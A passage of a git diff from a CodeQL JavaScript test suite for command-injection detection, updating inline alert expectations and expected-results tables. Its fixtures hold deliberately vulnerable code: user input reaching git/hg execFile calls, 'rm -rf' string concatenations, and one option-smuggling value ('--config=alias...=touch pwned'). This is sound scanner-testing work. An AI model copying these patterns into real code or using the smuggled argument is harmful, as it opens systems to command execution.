Command(); program.version('0.0.1'); - cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK - cp.exec("cmd.sh " + program.pizzaType); // NOT OK + cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert + cp.exec("cmd.sh " + program.pizzaType); // $ Alert - cp.execFile(program.opts().pizzaType, ["foo", "bar"]); // OK + cp.execFile(program.opts().pizzaType, ["foo", "bar"]); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.expected b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.expected index e449f163d463..e4396669dc85 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.expected @@ -1,3 +1,21 @@ +#select +| second-order.js:7:33:7:38 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:7:33:7:38 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | +| second-order.js:9:29:9:34 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:9:29:9:34 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | +| second-order.js:11:33:11:38 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:11:33:11:38 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | +| second-order.js:15:19:15:24 | myArgs | second-order.js:13:18:13:31 | req.query.args | second-order.js:15:19:15:24 | myArgs | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:13:18:13:31 | req.query.args | a user-provided value | +| second-order.js:26:35:26:40 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:26:35:26:40 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | +| second-order.js:29:19:29:32 | req.query.args | second-order.js:29:19:29:32 | req.query.args | second-order.js:29:19:29:32 | req.query.args | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:29:19:29:32 | req.query.args | a user-provided value | +| second-order.js:40:28:40:43 | req.query.remote | second-order.js:40:28:40:43 | req.query.remote | second-order.js:40:28:40:43 | req.query.remote | Command line argument that depends on $@ can execute an arbitrary command if --config=alias.= is used with hg. | second-order.js:40:28:40:43 | req.query.remote | a user-provided value | +| second-order.js:42:31:42:46 | req.query.remote | second-order.js:42:31:42:46 | req.query.remote | second-order.js:42:31:42:46 | req.query.remote | Command line argument that depends on $@ can execute an arbitrary command if --config=alias.= is used with hg. | second-order.js:42:31:42:46 | req.query.remote | a user-provided value | +| second-order.js:44:18:44:31 | req.query.args | second-order.js:44:18:44:31 | req.query.args | second-order.js:44:18:44:31 | req.query.args | Command line argument that depends on $@ can execute an arbitrary command if --config=alias.= is used with hg. | second-order.js:44:18:44:31 | req.query.args | a user-provided value | +edges +| second-order.js:6:9:6:33 | remote | second-order.js:7:33:7:38 | remote | provenance | | +| second-order.js:6:9:6:33 | remote | second-order.js:9:29:9:34 | remote | provenance | | +| second-order.js:6:9:6:33 | remote | second-order.js:11:33:11:38 | remote | provenance | | +| second-order.js:6:9:6:33 | remote | second-order.js:26:35:26:40 | remote | provenance | | +| second-order.js:6:18:6:33 | req.query.remote | second-order.js:6:9:6:33 | remote | provenance | | +| second-order.js:13:9:13:31 | myArgs | second-order.js:15:19:15:24 | myArgs | provenance | | +| second-order.js:13:18:13:31 | req.query.args | second-order.js:13:9:13:31 | myArgs | provenance | | nodes | second-order.js:6:9:6:33 | remote | semmle.label | remote | | second-order.js:6:18:6:33 | req.query.remote | semmle.label | req.query.remote | @@ -12,22 +30,4 @@ nodes | second-order.js:40:28:40:43 | req.query.remote | semmle.label | req.query.remote | | second-order.js:42:31:42:46 | req.query.remote | semmle.label | req.query.remote | | second-order.js:44:18:44:31 | req.query.args | semmle.label | req.query.args | -edges -| second-order.js:6:9:6:33 | remote | second-order.js:7:33:7:38 | remote | provenance | | -| second-order.js:6:9:6:33 | remote | second-order.js:9:29:9:34 | remote | provenance | | -| second-order.js:6:9:6:33 | remote | second-order.js:11:33:11:38 | remote | provenance | | -| second-order.js:6:9:6:33 | remote | second-order.js:26:35:26:40 | remote | provenance | | -| second-order.js:6:18:6:33 | req.query.remote | second-order.js:6:9:6:33 | remote | provenance | | -| second-order.js:13:9:13:31 | myArgs | second-order.js:15:19:15:24 | myArgs | provenance | | -| second-order.js:13:18:13:31 | req.query.args | second-order.js:13:9:13:31 | myArgs | provenance | | subpaths -#select -| second-order.js:7:33:7:38 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:7:33:7:38 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | -| second-order.js:9:29:9:34 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:9:29:9:34 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | -| second-order.js:11:33:11:38 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:11:33:11:38 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | -| second-order.js:15:19:15:24 | myArgs | second-order.js:13:18:13:31 | req.query.args | second-order.js:15:19:15:24 | myArgs | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:13:18:13:31 | req.query.args | a user-provided value | -| second-order.js:26:35:26:40 | remote | second-order.js:6:18:6:33 | req.query.remote | second-order.js:26:35:26:40 | remote | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:6:18:6:33 | req.query.remote | a user-provided value | -| second-order.js:29:19:29:32 | req.query.args | second-order.js:29:19:29:32 | req.query.args | second-order.js:29:19:29:32 | req.query.args | Command line argument that depends on $@ can execute an arbitrary command if --upload-pack is used with git. | second-order.js:29:19:29:32 | req.query.args | a user-provided value | -| second-order.js:40:28:40:43 | req.query.remote | second-order.js:40:28:40:43 | req.query.remote | second-order.js:40:28:40:43 | req.query.remote | Command line argument that depends on $@ can execute an arbitrary command if --config=alias.= is used with hg. | second-order.js:40:28:40:43 | req.query.remote | a user-provided value | -| second-order.js:42:31:42:46 | req.query.remote | second-order.js:42:31:42:46 | req.query.remote | second-order.js:42:31:42:46 | req.query.remote | Command line argument that depends on $@ can execute an arbitrary command if --config=alias.= is used with hg. | second-order.js:42:31:42:46 | req.query.remote | a user-provided value | -| second-order.js:44:18:44:31 | req.query.args | second-order.js:44:18:44:31 | req.query.args | second-order.js:44:18:44:31 | req.query.args | Command line argument that depends on $@ can execute an arbitrary command if --config=alias.= is used with hg. | second-order.js:44:18:44:31 | req.query.args | a user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.qlref index 00961f212e74..b6f6625a0e76 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/SecondOrderCommandInjection.qlref @@ -1 +1,2 @@ -Security/CWE-078/SecondOrderCommandInjection.ql \ No newline at end of file +query: Security/CWE-078/SecondOrderCommandInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js index f68093d24053..b49d6b2bd73b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js @@ -3,19 +3,19 @@ const app = express(); const { execFile } = require("child_process"); app.get("/", (req, res) => { - const remote = req.query.remote; - execFile("git", ["ls-remote", remote]); // NOT OK + const remote = req.query.remote; // $ Source + execFile("git", ["ls-remote", remote]); // $ Alert - execFile("git", ["fetch", remote]); // NOT OK + execFile("git", ["fetch", remote]); // $ Alert - indirect("git", ["ls-remote", remote]); // NOT OK + indirect("git", ["ls-remote", remote]); // $ Alert - const myArgs = req.query.args; + const myArgs = req.query.args; // $ Source - execFile("git", myArgs); // NOT OK + execFile("git", myArgs); // $ Alert if (remote.startsWith("--")) { - execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it is very explicit that options that allowed here. + execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it is very explicit that options that allowed here. } else { execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's not an option } @@ -23,10 +23,10 @@ app.get("/", (req, res) => { if (remote.startsWith("git@")) { execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's a git URL } else { - execFile("git", ["ls-remote", remote, "HEAD"]); // NOT OK - unknown starting string + execFile("git", ["ls-remote", remote, "HEAD"]); // $ Alert - unknown starting string } - execFile("git", req.query.args); // NOT OK - unknown args + execFile("git", req.query.args); // $ Alert - unknown args execFile("git", ["add", req.query.args]); // OK - git add is not a command that can be used to execute arbitrary code @@ -34,16 +34,16 @@ app.get("/", (req, res) => { execFile("git", ["ls-remote", req.query.remote].concat(req.query.otherArgs)); // NOT OK - but not found [INCONSISTENCY]. It's hard to track through concat. - execFile("git", ["add", "fpp"].concat(req.query.notVulnerable)); // OK + execFile("git", ["add", "fpp"].concat(req.query.notVulnerable)); // hg - execFile("hg", ["clone", req.query.remote]); // NOT OK + execFile("hg", ["clone", req.query.remote]); // $ Alert - execFile("hg", ["whatever", req.query.remote]); // NOT OK - `--config=alias.whatever=touch pwned` + execFile("hg", ["whatever", req.query.remote]); // $ Alert - `--config=alias.whatever=touch pwned` - execFile("hg", req.query.args); // NOT OK - unknown args + execFile("hg", req.query.args); // $ Alert - unknown args - execFile("hg", ["clone", "--", req.query.remote]); // OK + execFile("hg", ["clone", "--", req.query.remote]); }); function indirect(cmd, args) { diff --git a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment.qlref b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment.qlref index ee13f263562a..b9f570b25eee 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment.qlref @@ -1 +1,2 @@ -Security/CWE-078/ShellCommandInjectionFromEnvironment.ql \ No newline at end of file +query: Security/CWE-078/ShellCommandInjectionFromEnvironment.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js index 0d610b1e9dd3..0a0edcbd25c7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js @@ -2,12 +2,12 @@ var cp = require('child_process'), path = require('path'), execa = require("execa"); (function() { - cp.execFileSync('rm', ['-rf', path.join(__dirname, "temp")]); // GOOD - cp.execSync('rm -rf ' + path.join(__dirname, "temp")); // BAD + cp.execFileSync('rm', ['-rf', path.join(__dirname, "temp")]); + cp.execSync('rm -rf ' + path.join(__dirname, "temp")); // $ Alert - execa.shell('rm -rf ' + path.join(__dirname, "temp")); // NOT OK - execa.shellSync('rm -rf ' + path.join(__dirname, "temp")); // NOT OK + execa.shell('rm -rf ' + path.join(__dirname, "temp")); // $ Alert + execa.shellSync('rm -rf ' + path.join(__dirname, "temp")); // $ Alert const safe = "\"" + path.join(__dirname, "temp") + "\""; - execa.shellSync('rm -rf ' + safe); // OK + execa.shellSync('rm -rf ' + safe); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected index 482c3cfff1b4..c4b16b01a38f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected @@ -1,8 +1,115 @@ +#select +| lib/isImported.js:6:10:6:25 | "rm -rf " + name | lib/isImported.js:5:49:5:52 | name | lib/isImported.js:6:22:6:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/isImported.js:5:49:5:52 | name | library input | lib/isImported.js:6:2:6:26 | cp.exec ... + name) | shell command | +| lib/lib2.js:4:10:4:25 | "rm -rf " + name | lib/lib2.js:3:28:3:31 | name | lib/lib2.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib2.js:3:28:3:31 | name | library input | lib/lib2.js:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/lib2.js:8:10:8:25 | "rm -rf " + name | lib/lib2.js:7:32:7:35 | name | lib/lib2.js:8:22:8:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib2.js:7:32:7:35 | name | library input | lib/lib2.js:8:2:8:26 | cp.exec ... + name) | shell command | +| lib/lib.js:4:10:4:25 | "rm -rf " + name | lib/lib.js:3:33:3:36 | name | lib/lib.js:4:22:4:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:3:33:3:36 | name | library input | lib/lib.js:4:2:4:26 | cp.exec ... + name) | shell command | +| lib/lib.js:11:10:11:25 | "rm -rf " + name | lib/lib.js:10:32:10:35 | name | lib/lib.js:11:22:11:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:10:32:10:35 | name | library input | lib/lib.js:11:2:11:26 | cp.exec ... + name) | shell command | +| lib/lib.js:15:10:15:25 | "rm -rf " + name | lib/lib.js:14:36:14:39 | name | lib/lib.js:15:22:15:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:14:36:14:39 | name | library input | lib/lib.js:15:2:15:26 | cp.exec ... + name) | shell command | +| lib/lib.js:20:10:20:25 | "rm -rf " + name | lib/lib.js:19:34:19:37 | name | lib/lib.js:20:22:20:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:19:34:19:37 | name | library input | lib/lib.js:20:2:20:26 | cp.exec ... + name) | shell command | +| lib/lib.js:27:10:27:25 | "rm -rf " + name | lib/lib.js:26:35:26:38 | name | lib/lib.js:27:22:27:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:26:35:26:38 | name | library input | lib/lib.js:27:2:27:26 | cp.exec ... + name) | shell command | +| lib/lib.js:35:11:35:26 | "rm -rf " + name | lib/lib.js:34:14:34:17 | name | lib/lib.js:35:23:35:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:34:14:34:17 | name | library input | lib/lib.js:35:3:35:27 | cp.exec ... + name) | shell command | +| lib/lib.js:38:11:38:26 | "rm -rf " + name | lib/lib.js:37:13:37:16 | name | lib/lib.js:38:23:38:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:37:13:37:16 | name | library input | lib/lib.js:38:3:38:27 | cp.exec ... + name) | shell command | +| lib/lib.js:41:11:41:26 | "rm -rf " + name | lib/lib.js:40:6:40:9 | name | lib/lib.js:41:23:41:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:40:6:40:9 | name | library input | lib/lib.js:41:3:41:27 | cp.exec ... + name) | shell command | +| lib/lib.js:50:35:50:50 | "rm -rf " + name | lib/lib.js:49:31:49:34 | name | lib/lib.js:50:47:50:50 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:49:31:49:34 | name | library input | lib/lib.js:50:2:50:51 | require ... + name) | shell command | +| lib/lib.js:54:13:54:28 | "rm -rf " + name | lib/lib.js:53:33:53:36 | name | lib/lib.js:54:25:54:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:53:33:53:36 | name | library input | lib/lib.js:55:2:55:14 | cp.exec(cmd1) | shell command | +| lib/lib.js:57:13:57:28 | "rm -rf " + name | lib/lib.js:53:33:53:36 | name | lib/lib.js:57:25:57:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:53:33:53:36 | name | library input | lib/lib.js:59:3:59:14 | cp.exec(cmd) | shell command | +| lib/lib.js:65:10:65:25 | "rm -rf " + name | lib/lib.js:64:41:64:44 | name | lib/lib.js:65:22:65:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:65:2:65:26 | cp.exec ... + name) | shell command | +| lib/lib.js:69:10:69:47 | "for fo ... la end" | lib/lib.js:64:41:64:44 | name | lib/lib.js:69:27:69:30 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:69:2:69:48 | cp.exec ... a end") | shell command | +| lib/lib.js:71:10:71:31 | "cat /f ... + name | lib/lib.js:64:41:64:44 | name | lib/lib.js:71:28:71:31 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:71:2:71:32 | cp.exec ... + name) | shell command | +| lib/lib.js:73:10:73:31 | "cat \\" ... + "\\"" | lib/lib.js:64:41:64:44 | name | lib/lib.js:73:21:73:24 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:73:2:73:32 | cp.exec ... + "\\"") | shell command | +| lib/lib.js:75:10:75:29 | "cat '" + name + "'" | lib/lib.js:64:41:64:44 | name | lib/lib.js:75:20:75:23 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:75:2:75:30 | cp.exec ... + "'") | shell command | +| lib/lib.js:77:10:77:37 | "cat '/ ... e + "'" | lib/lib.js:64:41:64:44 | name | lib/lib.js:77:28:77:31 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:77:2:77:38 | cp.exec ... + "'") | shell command | +| lib/lib.js:83:10:83:25 | "rm -rf " + name | lib/lib.js:82:35:82:38 | name | lib/lib.js:83:22:83:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:83:2:83:26 | cp.exec ... + name) | shell command | +| lib/lib.js:86:13:86:16 | name | lib/lib.js:82:35:82:38 | name | lib/lib.js:86:13:86:16 | name | This array element which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:87:2:87:25 | cp.exec ... n(" ")) | shell command | +| lib/lib.js:89:21:89:24 | name | lib/lib.js:82:35:82:38 | name | lib/lib.js:89:21:89:24 | name | This array element which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:89:2:89:36 | cp.exec ... n(" ")) | shell command | +| lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | lib/lib.js:82:35:82:38 | name | lib/lib.js:91:21:91:38 | "\\"" + name + "\\"" | This array element which depends on $@ is later used in a $@. | lib/lib.js:82:35:82:38 | name | library input | lib/lib.js:91:2:91:50 | cp.exec ... n(" ")) | shell command | +| lib/lib.js:98:35:98:38 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:98:35:98:38 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:98:2:98:40 | cp.exec ... name)) | shell command | +| lib/lib.js:100:37:100:40 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:100:37:100:40 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:100:2:100:42 | cp.exec ... name)) | shell command | +| lib/lib.js:102:46:102:49 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:102:46:102:49 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:102:2:102:51 | cp.exec ... name)) | shell command | +| lib/lib.js:108:41:108:44 | name | lib/lib.js:97:35:97:38 | name | lib/lib.js:108:41:108:44 | name | This formatted string which depends on $@ is later used in a $@. | lib/lib.js:97:35:97:38 | name | library input | lib/lib.js:108:2:108:46 | cp.exec ... name)) | shell command | +| lib/lib.js:112:10:112:25 | "rm -rf " + name | lib/lib.js:111:34:111:37 | name | lib/lib.js:112:22:112:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:111:34:111:37 | name | library input | lib/lib.js:112:2:112:26 | cp.exec ... + name) | shell command | +| lib/lib.js:121:10:121:25 | "rm -rf " + name | lib/lib.js:120:33:120:36 | name | lib/lib.js:121:22:121:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:120:33:120:36 | name | library input | lib/lib.js:121:2:121:26 | cp.exec ... + name) | shell command | +| lib/lib.js:131:11:131:26 | "rm -rf " + name | lib/lib.js:130:6:130:9 | name | lib/lib.js:131:23:131:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:130:6:130:9 | name | library input | lib/lib.js:131:3:131:27 | cp.exec ... + name) | shell command | +| lib/lib.js:149:12:149:27 | "rm -rf " + name | lib/lib.js:148:37:148:40 | name | lib/lib.js:149:24:149:27 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:148:37:148:40 | name | library input | lib/lib.js:152:2:152:23 | cp.spaw ... gs, cb) | shell command | +| lib/lib.js:161:13:161:28 | "rm -rf " + name | lib/lib.js:155:38:155:41 | name | lib/lib.js:161:25:161:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:155:38:155:41 | name | library input | lib/lib.js:163:2:167:2 | cp.spaw ... t' }\\n\\t) | shell command | +| lib/lib.js:173:10:173:23 | "fo \| " + name | lib/lib.js:170:41:170:44 | name | lib/lib.js:173:20:173:23 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:170:41:170:44 | name | library input | lib/lib.js:173:2:173:24 | cp.exec ... + name) | shell command | +| lib/lib.js:181:15:181:52 | "'" + n ... ) + "'" | lib/lib.js:177:38:177:41 | name | lib/lib.js:181:21:181:46 | name.re ... "'\\''") | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:177:38:177:41 | name | library input | lib/lib.js:182:2:182:28 | cp.exec ... broken) | shell command | +| lib/lib.js:182:10:182:27 | "rm -rf " + broken | lib/lib.js:177:38:177:41 | name | lib/lib.js:182:22:182:27 | broken | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:177:38:177:41 | name | library input | lib/lib.js:182:2:182:28 | cp.exec ... broken) | shell command | +| lib/lib.js:187:10:187:25 | "rm -rf " + name | lib/lib.js:186:34:186:37 | name | lib/lib.js:187:22:187:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:186:34:186:37 | name | library input | lib/lib.js:187:2:187:26 | cp.exec ... + name) | shell command | +| lib/lib.js:190:11:190:26 | "rm -rf " + name | lib/lib.js:186:34:186:37 | name | lib/lib.js:190:23:190:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:186:34:186:37 | name | library input | lib/lib.js:190:3:190:27 | cp.exec ... + name) | shell command | +| lib/lib.js:197:10:197:25 | "rm -rf " + name | lib/lib.js:196:45:196:48 | name | lib/lib.js:197:22:197:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:196:45:196:48 | name | library input | lib/lib.js:197:2:197:26 | cp.exec ... + name) | shell command | +| lib/lib.js:200:11:200:26 | "rm -rf " + name | lib/lib.js:196:45:196:48 | name | lib/lib.js:200:23:200:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:196:45:196:48 | name | library input | lib/lib.js:200:3:200:27 | cp.exec ... + name) | shell command | +| lib/lib.js:207:10:207:25 | "rm -rf " + name | lib/lib.js:206:45:206:48 | name | lib/lib.js:207:22:207:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:206:45:206:48 | name | library input | lib/lib.js:207:2:207:26 | cp.exec ... + name) | shell command | +| lib/lib.js:212:11:212:26 | "rm -rf " + name | lib/lib.js:206:45:206:48 | name | lib/lib.js:212:23:212:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:206:45:206:48 | name | library input | lib/lib.js:212:3:212:27 | cp.exec ... + name) | shell command | +| lib/lib.js:217:10:217:25 | "rm -rf " + name | lib/lib.js:216:39:216:42 | name | lib/lib.js:217:22:217:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:216:39:216:42 | name | library input | lib/lib.js:217:2:217:26 | cp.exec ... + name) | shell command | +| lib/lib.js:220:11:220:26 | "rm -rf " + name | lib/lib.js:216:39:216:42 | name | lib/lib.js:220:23:220:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:216:39:216:42 | name | library input | lib/lib.js:220:3:220:27 | cp.exec ... + name) | shell command | +| lib/lib.js:224:10:224:25 | "rm -rf " + name | lib/lib.js:216:39:216:42 | name | lib/lib.js:224:22:224:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:216:39:216:42 | name | library input | lib/lib.js:224:2:224:26 | cp.exec ... + name) | shell command | +| lib/lib.js:228:10:228:25 | "rm -rf " + name | lib/lib.js:227:39:227:42 | name | lib/lib.js:228:22:228:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:227:39:227:42 | name | library input | lib/lib.js:228:2:228:26 | cp.exec ... + name) | shell command | +| lib/lib.js:236:10:236:25 | "rm -rf " + name | lib/lib.js:227:39:227:42 | name | lib/lib.js:236:22:236:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:227:39:227:42 | name | library input | lib/lib.js:236:2:236:26 | cp.exec ... + name) | shell command | +| lib/lib.js:249:10:249:25 | "rm -rf " + name | lib/lib.js:248:42:248:45 | name | lib/lib.js:249:22:249:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:248:42:248:45 | name | library input | lib/lib.js:249:2:249:26 | cp.exec ... + name) | shell command | +| lib/lib.js:253:10:253:28 | "rm -rf " + cleaned | lib/lib.js:248:42:248:45 | name | lib/lib.js:253:22:253:28 | cleaned | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:248:42:248:45 | name | library input | lib/lib.js:253:2:253:29 | cp.exec ... leaned) | shell command | +| lib/lib.js:258:10:258:25 | "rm -rf " + name | lib/lib.js:257:35:257:38 | name | lib/lib.js:258:22:258:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:257:35:257:38 | name | library input | lib/lib.js:258:2:258:26 | cp.exec ... + name) | shell command | +| lib/lib.js:261:11:261:33 | "rm -rf ... + name | lib/lib.js:257:35:257:38 | name | lib/lib.js:261:30:261:33 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:257:35:257:38 | name | library input | lib/lib.js:261:3:261:34 | cp.exec ... + name) | shell command | +| lib/lib.js:268:10:268:32 | "rm -rf ... version | lib/lib.js:267:46:267:48 | obj | lib/lib.js:268:22:268:32 | obj.version | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:267:46:267:48 | obj | library input | lib/lib.js:268:2:268:33 | cp.exec ... ersion) | shell command | +| lib/lib.js:277:11:277:30 | "rm -rf " + opts.bla | lib/lib.js:276:8:276:11 | opts | lib/lib.js:277:23:277:30 | opts.bla | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:276:8:276:11 | opts | library input | lib/lib.js:277:3:277:31 | cp.exec ... ts.bla) | shell command | +| lib/lib.js:281:11:281:35 | "rm -rf ... pts.bla | lib/lib.js:276:8:276:11 | opts | lib/lib.js:281:23:281:35 | this.opts.bla | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:276:8:276:11 | opts | library input | lib/lib.js:281:3:281:36 | cp.exec ... ts.bla) | shell command | +| lib/lib.js:308:11:308:26 | "rm -rf " + name | lib/lib.js:307:39:307:42 | name | lib/lib.js:308:23:308:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:307:39:307:42 | name | library input | lib/lib.js:308:3:308:27 | cp.exec ... + name) | shell command | +| lib/lib.js:315:10:315:25 | "rm -rf " + name | lib/lib.js:314:40:314:43 | name | lib/lib.js:315:22:315:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:314:40:314:43 | name | library input | lib/lib.js:315:2:315:26 | cp.exec ... + name) | shell command | +| lib/lib.js:320:11:320:26 | "rm -rf " + name | lib/lib.js:314:40:314:43 | name | lib/lib.js:320:23:320:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:314:40:314:43 | name | library input | lib/lib.js:320:3:320:27 | cp.exec ... + name) | shell command | +| lib/lib.js:325:12:325:51 | "MyWind ... " + arg | lib/lib.js:324:40:324:42 | arg | lib/lib.js:325:49:325:51 | arg | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:324:40:324:42 | arg | library input | lib/lib.js:326:2:326:13 | cp.exec(cmd) | shell command | +| lib/lib.js:340:10:340:26 | 